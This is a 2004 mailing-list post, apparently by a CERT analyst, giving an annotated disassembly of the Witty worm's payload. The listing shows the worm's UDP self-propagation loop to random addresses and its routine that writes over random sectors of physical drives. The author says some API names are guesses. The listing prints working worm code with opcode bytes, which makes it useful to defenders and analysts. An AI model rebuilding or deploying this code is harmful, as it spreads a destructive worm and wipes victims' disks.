Re: Any dissasemblies of the Witty worm yet?
Here is some preliminary work, I don't claim it to be exact, since
the API calls are guessed at the moment (I still have to get BlackICE),
but it should give a pretty good idea on how the thing work.
The WriteFile might be ReadFile (which is the way Symantec sees it in
their analysis), but in my opinion the GENERIC_WRITE flag (and the fact
the memory at 0x5e000000 might be code section, then not writeable)
makes me think it writes arbitrary places of random physical disks -
with the consequences one can imagine.
Correct me if I am wrong, I would like to receive feedback about this.
Regards,
Kostya Kortchinsky
CERT RENATER
Nicholas Weaver wrote:
Has anyone done a dissassembly of the "Witty" worm yet?
http://isc.incidents.org/diary.html?date=2004-03-20
http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html
using the
http://seclists.org/lists/bugtraq/2004/Mar/0181.html
recent bug in BlackICE/RealSecure?
We are seeing a lot of activity from this worm, although even
a small infection would generate a LOT of traffic (a side-effect of
bandwidth-limited worms, such as single-packet UDP worms).
Thanks.
seg000:000000D1 ;
---------------------------------------------------------------------------
seg000:000000D1
seg000:000000D1 loc_D1:
; CODE XREF: seg000:000002ABj
seg000:000000D1 89 E7 mov edi, esp
seg000:000000D3 8B 7F 14 mov edi, [edi+14h]
seg000:000000D6 83 C7 08 add edi, 8
seg000:000000D9 81 C4 E8 FD FF FF add esp, 0FFFFFDE8h
seg000:000000DF 31 C9 xor ecx, ecx
seg000:000000E1 66 B9 33 32 mov cx, 3233h
; 32
seg000:000000E5 51 push ecx
seg000:000000E6 68 77 73 32 5F push 5F327377h
; ws2_
seg000:000000EB 54 push esp
seg000:000000EC db 3Eh
seg000:000000EC 3E FF 15 9C 40 0D+ call dword ptr
ds:5E0D409Ch ; Probably LoadLibrary
seg000:000000F3 89 C3 mov ebx, eax
seg000:000000F5 31 C9 xor ecx, ecx
seg000:000000F7 66 B9 65 74 mov cx, 7465h
; et
seg000:000000FB 51 push ecx
seg000:000000FC 68 73 6F 63 6B push 6B636F73h
; sock
seg000:00000101 54 push esp
seg000:00000102 53 push ebx
seg000:00000103 db 3Eh
seg000:00000103 3E FF 15 98 40 0D+ call dword ptr
ds:5E0D4098h ; Probably GetProcAddress
seg000:0000010A 6A 11 push 11h
; IPPROTO_UDP
seg000:0000010C 6A 02 push 2
; SOCK_DGRAM
seg000:0000010E 6A 02 push 2
; AF_INET
seg000:00000110 FF D0 call eax
; socket()
seg000:00000112 89 C6 mov esi, eax
seg000:00000114 31 C9 xor ecx, ecx
seg000:00000116 51 push ecx
seg000:00000117 68 62 69 6E 64 push 646E6962h
; bind
seg000:0000011C 54 push esp
seg000:0000011D 53 push ebx
seg000:0000011E db 3Eh
seg000:0000011E 3E FF 15 98 40 0D+ call dword ptr
ds:5E0D4098h ; Probably GetProcAddress
seg000:00000125 31 C9 xor ecx, ecx
seg000:00000127 51 push ecx
seg000:00000128 51 push ecx
seg000:00000129 51 push ecx
; sin.sin_addr.s_addr = INADDR_ANY
seg000:0000012A 81 E9 FE FF F0 5F sub ecx, 5FF0FFFEh
; 0xa00f0002
seg000:00000130 51 push ecx
; sin.sin_family = AF_INET
seg000:00000130
; sin.sin_port = htons(4000)
seg000:00000131 89 E1 mov ecx, esp
seg000:00000133 6A 10 push 10h
; sizeof(struct sockaddr)
seg000:00000135 51 push ecx
; &sin
seg000:00000136 56 push esi
; s
seg000:00000137 FF D0 call eax
; bind()
seg000:00000139 31 C9 xor ecx, ecx
seg000:0000013B 66 B9 74 6F mov cx, 6F74h
; to
seg000:0000013F 51 push ecx
seg000:00000140 68 73 65 6E 64 push 646E6573h
; send
seg000:00000145 54 push esp
seg000:00000146 53 push ebx
seg000:00000147 db 3Eh
seg000:00000147 3E FF 15 98 40 0D+ call dword ptr
ds:5E0D4098h ; Probably GetProcAddress
seg000:0000014E 89 C3 mov ebx, eax
seg000:00000150 83 C4 3C add esp, 3Ch
seg000:00000153
seg000:00000153 loc_153:
; CODE XREF: seg000:000002A2j
seg000:00000153 31 C9 xor ecx, ecx
seg000:00000155 51 push ecx
seg000:00000156 68 65 6C 33 32 push 32336C65h
; el32
seg000:0000015B 68 6B 65 72 6E push 6E72656Bh
; kern
seg000:00000160 54 push esp
seg000:00000161 db 3Eh
seg000:00000161 3E FF 15 9C 40 0D+ call dword ptr
ds:5E0D409Ch ; Probably LoadLibrary
seg000:00000168 31 C9 xor ecx, ecx
seg000:0000016A 51 push ecx
seg000:0000016B 68 6F 75 6E 74 push 746E756Fh
; ount
seg000:00000170 68 69 63 6B 43 push 436B6369h
; ickC
seg000:00000175 68 47 65 74 54 push 54746547h
; GetT
seg000:0000017A 54 push esp
seg000:0000017B 50 push eax
seg000:0000017C db 3Eh
seg000:0000017C 3E FF 15 98 40 0D+ call dword ptr
ds:5E0D4098h ; Probably GetProcAddress
seg000:00000183 FF D0 call eax
; GetTickCount()
seg000:00000185 89 C5 mov ebp, eax
seg000:00000187 83 C4 1C add esp, 1Ch
seg000:0000018A 31 C9 xor ecx, ecx
seg000:0000018C 81 E9 E0 B1 FF FF sub ecx,
0FFFFB1E0h ; 0x4e20
seg000:00000192
seg000:00000192 loc_192:
; CODE XREF: seg000:000001F8j
seg000:00000192
; seg000:00000255j
seg000:00000192 51 push ecx
seg000:00000193 31 C0 xor eax, eax
seg000:00000195 2D 03 BC FC FF sub eax,
0FFFCBC03h ; 0x343fd
seg000:0000019A F7 E5 mul ebp
seg000:0000019C 2D 3D 61 D9 FF sub eax,
0FFD9613Dh ; 0x269ec3
seg000:000001A1 89 C1 mov ecx, eax
; rand() function, without the 0x7fff mask, shift coming afterwards
seg000:000001A1
; srand() done with GetTickCount()
seg000:000001A3 31 C0 xor eax, eax
seg000:000001A5 2D 03 BC FC FF sub eax, 0FFFCBC03h
seg000:000001AA F7 E1 mul ecx
seg000:000001AC 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
seg000:000001B1 89 C5 mov ebp, eax
seg000:000001B3 31 D2 xor edx, edx
seg000:000001B5 52 push edx
seg000:000001B6 52 push edx
seg000:000001B7 C1 E9 10 shr ecx, 10h
seg000:000001BA 66 89 C8 mov ax, cx
seg000:000001BD 50 push eax
; to.sin_addr.s_addr = (rand() << 16) | rand()
seg000:000001BE 31 C0 xor eax, eax
seg000:000001C0 2D 03 BC FC FF sub eax, 0FFFCBC03h
seg000:000001C5 F7 E5 mul ebp
seg000:000001C7 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
seg000:000001CC 89 C5 mov ebp, eax
seg000:000001CE 30 E4 xor ah, ah
seg000:000001D0 B0 02 mov al, 2
seg000:000001D2 50 push eax
; to.sin_family = AF_INET
seg000:000001D2
; to.sin_port = rand()
seg000:000001D3 89 E0 mov eax, esp
seg000:000001D5 6A 10 push 10h
; sizeof(struct sockaddr)
seg000:000001D7 50 push eax
; &to
seg000:000001D8 31 C0 xor eax, eax
seg000:000001DA 50 push eax
; flags
seg000:000001DB 2D 03 BC FC FF sub eax, 0FFFCBC03h
seg000:000001E0 F7 E5 mul ebp
seg000:000001E2 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
seg000:000001E7 89 C5 mov ebp, eax
seg000:000001E9 C1 E8 17 shr eax, 17h
seg000:000001EC 80 C4 03 add ah, 3
seg000:000001EF 50 push eax
; len = 0x300 + (rand() >> 7)
seg000:000001F0 57 push edi
; buf
seg000:000001F1 56 push esi
; s
seg000:000001F2 FF D3 call ebx
; sendto()
seg000:000001F4 83 C4 10 add esp, 10h
seg000:000001F7 59 pop ecx
seg000:000001F8 E2 98 loop loc_192
seg000:000001FA 31 C0 xor eax, eax
seg000:000001FC 2D 03 BC FC FF sub eax, 0FFFCBC03h
seg000:00000201 F7 E5 mul ebp
seg000:00000203 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
seg000:00000208 89 C5 mov ebp, eax
seg000:0000020A C1 E8 10 shr eax, 10h
seg000:0000020D 80 E4 07 and ah, 7
seg000:00000210 80 CC 30 or ah, 30h
; 0x30 | (rand() & 7)
seg000:00000213 B0 45 mov al, 45h ; 'E'
; E
seg000:00000215 50 push eax
seg000:00000216 68 44 52 49 56 push 56495244h
; DRIV
seg000:0000021B 68 49 43 41 4C push 4C414349h
; ICAL
seg000:00000220 68 50 48 59 53 push 53594850h
; PHYS
seg000:00000225 68 5C 5C 2E 5C push 5C2E5C5Ch
; \\.\
seg000:00000225
; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7
seg000:0000022A 89 E0 mov eax, esp
seg000:0000022C 31 C9 xor ecx, ecx
seg000:0000022E 51 push ecx
; NULL
seg000:0000022F B2 20 mov dl, 20h ; ' '
seg000:00000231 C1 E2 18 shl edx, 18h
seg000:00000234 52 push edx
; FILE_FLAG_NO_BUFFERING (0x20000000)
seg000:00000235 6A 03 push 3
; OPEN_EXISTING
seg000:00000237 51 push ecx
; NULL
seg000:00000238 6A 03 push 3
; FILE_SHARE_READ | FILE_SHARE_WRITE
seg000:0000023A D1 E2 shl edx, 1
seg000:0000023C 52 push edx
; GENERIC_WRITE (0x40000000)
seg000:0000023D 50 push eax
; lpFileName
seg000:0000023E db 3Eh
seg000:0000023E 3E FF 15 DC 40 0D+ call dword ptr
ds:5E0D40DCh ; Probably CreateFile
seg000:00000245 83 C4 14 add esp, 14h
seg000:00000248 31 C9 xor ecx, ecx
seg000:0000024A 81 E9 E0 B1 FF FF sub ecx,
0FFFFB1E0h ; 0x4e20
seg000:00000250 3D FF FF FF FF cmp eax, 0FFFFFFFFh
seg000:00000255 0F 84 37 FF FF FF jz loc_192
seg000:0000025B 56 push esi
; (saving socket)
seg000:0000025C 89 C6 mov esi, eax
seg000:0000025E 31 C0 xor eax, eax
seg000:00000260 50 push eax
; FILE_BEGIN
seg000:00000261 50 push eax
; NULL
seg000:00000262 2D 03 BC FC FF sub eax, 0FFFCBC03h
seg000:00000267 F7 E5 mul ebp
seg000:00000269 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
seg000:0000026E 89 C5 mov ebp, eax
seg000:00000270 D1 E8 shr eax, 1
seg000:00000272 66 89 C8 mov ax, cx
seg000:00000275 50 push eax
; (rand() << 15) | 0x4e20
seg000:00000276 56 push esi
; hFile
seg000:00000277 db 3Eh
seg000:00000277 3E FF 15 C4 40 0D+ call dword ptr
ds:5E0D40C4h ; Probably SetFilePointer
seg000:00000277 5E
; (really not sure about this one)
seg000:0000027E 31 C9 xor ecx, ecx
seg000:00000280 51 push ecx
; 0
seg000:00000281 89 E2 mov edx, esp
seg000:00000283 51 push ecx
; NULL
seg000:00000284 52 push edx
; lpNumberOfBytesWritten
seg000:00000285 B5 80 mov ch, 80h ; 'Ç'
seg000:00000287 D1 E1 shl ecx, 1
seg000:00000289 51 push ecx
; nNumberOfBytesToWrite (0x10000)
seg000:0000028A B1 5E mov cl, 5Eh ; '^'
seg000:0000028C C1 E1 18 shl ecx, 18h
seg000:0000028F 51 push ecx
; lpBuffer (0x5e000000)
seg000:00000290 56 push esi
; hFile
seg000:00000291 db 3Eh
seg000:00000291 3E FF 15 94 40 0D+ call dword ptr
ds:5E0D4094h ; Probably WriteFile
seg000:00000298 56 push esi
; hObject
seg000:00000299 db 3Eh
seg000:00000299 3E FF 15 38 40 0D+ call dword ptr
ds:5E0D4038h ; Probably CloseHandle
seg000:000002A0 5E pop esi
seg000:000002A1 5E pop esi
; (restoring socket)
seg000:000002A2 E9 AC FE FF FF jmp loc_153
seg000:000002A2 ;
---------------------------------------------------------------------------
seg000:000002A7 63 76 07 5E dd 5E077663h
seg000:000002AB ;
---------------------------------------------------------------------------
seg000:000002AB E9 21 FE FF FF jmp loc_D1
seg000:000002AB ;
---------------------------------------------------------------------------